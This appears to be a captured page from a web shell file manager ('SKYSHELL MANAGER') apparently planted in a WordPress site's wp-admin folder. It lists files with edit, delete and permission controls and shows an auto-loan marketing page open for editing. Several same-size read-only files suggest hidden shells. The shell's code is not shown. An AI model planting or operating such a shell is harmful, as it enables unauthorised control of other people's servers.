📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: loan3.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Quick DebtFunds</title> <link rel="shortcut icon" href="img/fav.png" /> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> <!-- Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&family=Inter:slnt,wght@-10..0,100..900&display=swap" rel="stylesheet"> <!-- Icon Font Stylesheet --> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css"/> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> <!-- Libraries Stylesheet --> <link rel="stylesheet" href="lib/animate/animate.min.css"/> <link href="lib/lightbox/css/lightbox.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <!-- Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Template Stylesheet --> <link href="css/style.css" rel="stylesheet"> </head> <body> <!-- Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center"> <div class="spinner-border text-primary" style="width: 3rem; height: 3rem;" role="status"> <span class="sr-only">Loading...</span> </div> </div> <!-- Spinner End --> <!-- Navbar & Hero Start --> <div class="container-fluid nav-bar px-0 px-lg-4 py-lg-0"> <div class="container"> <nav class="navbar navbar-expand-lg navbar-light"> <a href="index.php" class="navbar-brand p-0"> <img src="img/logo.png" alt="Logo"> </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="fa fa-bars"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-0 mx-lg-auto"> <a href="index.php" class="nav-item nav-link active">Home</a> <a href="about.php" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="nav-link" data-bs-toggle="dropdown"> <span class="dropdown-toggle">Finance</span> </a> <div class="dropdown-menu"> <a href="finance1.php" class="dropdown-item">Investment</a> <a href="finance2.php" class="dropdown-item">Tax</a> <a href="finance3.php" class="dropdown-item">Forex</a> <a href="finance4.php" class="dropdown-item">Retirement Planning</a> <a href="finance5.php" class="dropdown-item">Cryptocurrency</a> </div> </div> <div class="nav-item dropdown"> <a href="#" class="nav-link" data-bs-toggle="dropdown"> <span class="dropdown-toggle">Loan</span> </a> <div class="dropdown-menu"> <a href="loan1.php" class="dropdown-item">Personal Loan</a> <a href="loan2.php" class="dropdown-item">Auto Loan</a> <a href="loan4.php" class="dropdown-item">Student Loan</a> <a href="loan5.php" class="dropdown-item">Home Equity Loan</a> </div> </div> <div class="nav-item dropdown"> <a href="#" class="nav-link" data-bs-toggle="dropdown"> <span class="dropdown-toggle">Insurance</span> </a> <div class="dropdown-menu"> <a href="service1.php" class="dropdown-item">Life Insurance</a> <a href="service2.php" class="dropdown-item">Health Insurance </a> <a href="service3.php" class="dropdown-item">Car Insurance</a> <a href="service4.php" class="dropdown-item">Home Insurance</a> <a href="service5.php" class="dropdown-item">Renters Insurance</a> <a href="service6.php" class="dropdown-item">Travel Insurance</a> <a href="service7.php" class="dropdown-item">Pet Insurance</a> <a href="service8.php" class="dropdown-item">Event Insurance</a> </div> </div> <a href="contact.php" class="nav-item nav-link">Contact</a> <div class="nav-btn px-3"> <a class="btn btn-primary rounded-pill py-2 px-4 ms-3 flex-shrink-0" onclick="openPopup()"> Get a Quote</a> <div class="popup-container" id="popupContainer"> <div class="popup"> <div style="padding-bottom:10px;"> <button class="close-btn" onclick="closePopup()">X</button> <h2>Subscribe to Get Free Quote</h2> </div> <form> <div class="row g-3"> <div class="col-lg-12 col-xl-8"> <p style="font-size: 14px;">Join our community and be the first to receive exclusive updates, and latest news in insurance, finance, and security planning delivered straight to your inbox!</p> <div class="form-floating"> <input type="text" class="form-control border-0" id="name" placeholder="Your Name"> <label for="name">Your Name</label> </div> </div> <div class="col-lg-12 col-xl-8"> <div class="form-floating"> <input type="email" class="form-control border-0" id="email" placeholder="Your Email"> <label for="email">Your Email</label> </div> </div> <div class="col-6"> <button class="btn btn-primary w-100 py-3">Subscribe</button> </div> </div> </form> </div> </div> <script> function openPopup() { document.getElementById('popupContainer').style.display = 'flex'; } function closePopup() { document.getElementById('popupContainer').style.display = 'none'; } </script> </div> </div> </div> </nav> </div> </div> <!-- Navbar & Hero End --> <!-- Modal Search Start --> <div class="modal fade" id="searchModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog modal-fullscreen"> <div class="modal-content rounded-0"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Search by keyword</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body d-flex align-items-center bg-primary"> <div class="input-group w-75 mx-auto d-flex"> <input type="search" class="form-control p-3" placeholder="keywords" aria-describedby="search-icon-1"> <span id="search-icon-1" class="btn bg-light border nput-group-text p-3"><i class="fa fa-search"></i></span> </div> </div> </div> </div> </div> <!-- Modal Search End --> <!-- About Start --> <div class="container-fluid bg-light about py-5"> <div class="container py-5"> <div class="row g-5"> <div class="col-xl-8 wow fadeInLeft" data-wow-delay="0.2s"> <div class="about-item-content bg-white rounded p-5 h-100"> <h1 class="display-4 mb-4">Drive Your Dreams with Flexible Auto Loans</h1> <p>Auto loans are a popular choice for people looking to finance the purchase of a new or used vehicle. With an auto loan, you can get the car you need without paying the full price upfront. Whether you are buying your first car, upgrading your current vehicle, or refinancing an existing auto loan, the right financing option can make your car purchase easier and more affordable. Auto loans come in various forms, including traditional loans, lease-to-own agreements, and refinancing options.</p> <h2 class="display-6 mt-4">Why Choose an Auto Loan?</h2> <p>Auto loans offer an easy and cost-effective way to buy the vehicle you need. Most lenders, including Quickdebtfunds, offer competitive interest rates, allowing you to spread out your payments over several years. Auto loans can also help you manage your cash flow, enabling you to purchase a car without draining your savings. Furthermore, having a set repayment schedule allows for better financial planning, and with the right loan, you can secure a car without paying exorbitant interest rates.</p> <h2 class="display-6 mt-4">Key Features of Auto Loans</h2> <ul> <li><strong>Fixed Interest Rates</strong> – Many auto loans offer fixed interest rates, meaning your monthly payments remain the same throughout the loan term.</li> <li><strong>Flexible Loan Terms</strong> – Choose from short or long loan terms to match your budget, with typical terms ranging from 36 to 72 months.</li> <li><strong>Easy Application Process</strong> – Apply online and receive quick approval decisions, streamlining the process of getting your new vehicle.</li> <li><strong>Competitive Interest Rates</strong> – Auto loans generally offer lower rates compared to personal loans, helping you save money on your vehicle purchase.</li> <li><strong>Flexible Repayment Options</strong> – Auto loans allow for monthly payments, which can fit into your budget, and some lenders offer the option to make extra payments to pay off the loan early.</li> </ul> <h2 class="display-6 mt-4">Advantages of Auto Loans</h2> <p>One of the major advantages of auto loans is the ability to finance a vehicle without having to pay the full price upfront. By spreading the payments out over time, you can maintain your cash flow while still securing a reliable car. Fixed interest rates are often available, providing stability and predictability in your payments. In addition, making timely payments on your auto loan can help improve your credit score, which will benefit your future financing opportunities.</p> <p>Furthermore, auto loans may offer flexible terms, so you can choose a repayment period that suits your budget. For those who want lower monthly payments, longer loan terms are available, although this may increase the total interest paid over the life of the loan. Whether you're purchasing a new or used car, or refinancing an existing loan, auto loans provide a straightforward way to drive the car you want.</p> <h2 class="display-6 mt-4">How to Apply for an Auto Loan</h2> <p>To apply for an auto loan, start by determining the loan amount you need and evaluating your budget. Gather documents like proof of income, employment history, and your credit score to help the lender assess your financial situation. After comparing offers from various lenders, including Quickdebtfunds, choose the one with the most favorable terms for you. Once you’ve received approval, the funds will be provided, and you'll start making regular monthly payments on your vehicle.</p> <a class="btn btn-primary rounded-pill py-3 px-5" href="#">Apply for an Auto Loan</a> <a class="btn btn-primary rounded-pill py-3 px-5" href="#">Get a Quote</a> <a class="btn btn-outline-primary rounded-pill py-3 px-5 ms-3" href="#">Contact Us</a> </div> </div> <div class="col-xl-4 wow fadeInRight" data-wow-delay="0.2s"> <div class="service-item" style="background: #ffffff;border-radius: 10px;margin-bottom: 40px;"> <div class="service-img"> <img src="img/bb1.jpg" class="img-fluid rounded-top w-100" alt=""> </div> <div class="service-content p-4"> <div class="service-content-inner"> <a href="blog6.php" class="d-inline-block h4 mb-4">Mastering Personal Finance: Tips for Managing Your Money</a> <a class="btn btn-primary rounded-pill py-2 px-4" href="blog6.php">Read More</a> </div> </div> </div> <div class="service-item" style="background: #ffffff;border-radius: 10px;margin-bottom: 40px;"> <div class="service-img"> <img src="img/bb2.jpg" class="img-fluid rounded-top w-100" alt=""> </div> <div class="service-content p-4"> <div class="service-content-inner"> <a href="blog5.php" class="d-inline-block h4 mb-4">Why Cybersecurity is Critical for Small Businesses</a> <a class="btn btn-primary rounded-pill py-2 px-4" href="blog5.php">Read More</a> </div> </div> </div> <div class="service-item" style="background: #ffffff;border-radius: 10px;margin-bottom: 40px;"> <div class="service-img"> <img src="img/bb3.jpg" class="img-fluid rounded-top w-100" alt=""> </div> <div class="service-content p-4"> <div class="service-content-inner"> <a href="blog4.php" class="d-inline-block h4 mb-4">Why Identity Theft Protection is Essential in the Digital Age</a> <a class="btn btn-primary rounded-pill py-2 px-4" href="blog4.php">Read More</a> </div> </div> </div> <div class="service-item" style="background: #ffffff;border-radius: 10px;margin-bottom: 40px;"> <div class="service-img"> <img src="img/bb4.jpg" class="img-fluid rounded-top w-100" alt=""> </div> <div class="service-content p-4"> <div class="service-content-inner"> <a href="blog3.php" class="d-inline-block h4 mb-4">Why Travel Insurance is Essential for Every Trip</a> <a class="btn btn-primary rounded-pill py-2 px-4" href="blog3.php">Read More</a> </div> </div> </div> </div> </div> </div> </div> <!-- About End --> <!-- Copyright Start --> <div class="container-fluid copyright py-4"> <div class="container"> <div class="row g-4 align-items-center"> <div class="col-md-6 text-center text-md-end mb-md-0" style="font-size: 12px;"> <span class="text-body"><a href="index.php" class="border-bottom text-white"><i class="fas fa-copyright text-light me-2"></i>2025 Quick DebtFunds</a>, All right reserved.</span> </div> <div class="col-md-6 text-center text-md-start text-body" style="font-size: 12px;"> <a class="border-bottom text-white" href="privacypolicy.php"> Privacy Policy </a><a class="border-bottom text-white" href="termsandconditions.php"> Terms & Conditions </a> </div> </div> </div> </div> <!-- Copyright End --> <!-- Back to Top --> <a href="#" class="btn btn-primary btn-lg-square rounded-circle back-to-top"><i class="fa fa-arrow-up"></i></a> <!-- JavaScript Libraries --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script> <script src="lib/wow/wow.min.js"></script> <script src="lib/easing/easing.min.js"></script> <script src="lib/waypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/lightbox/js/lightbox.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <!-- Template Javascript --> <script src="js/main.js"></script> </body> </html>
Save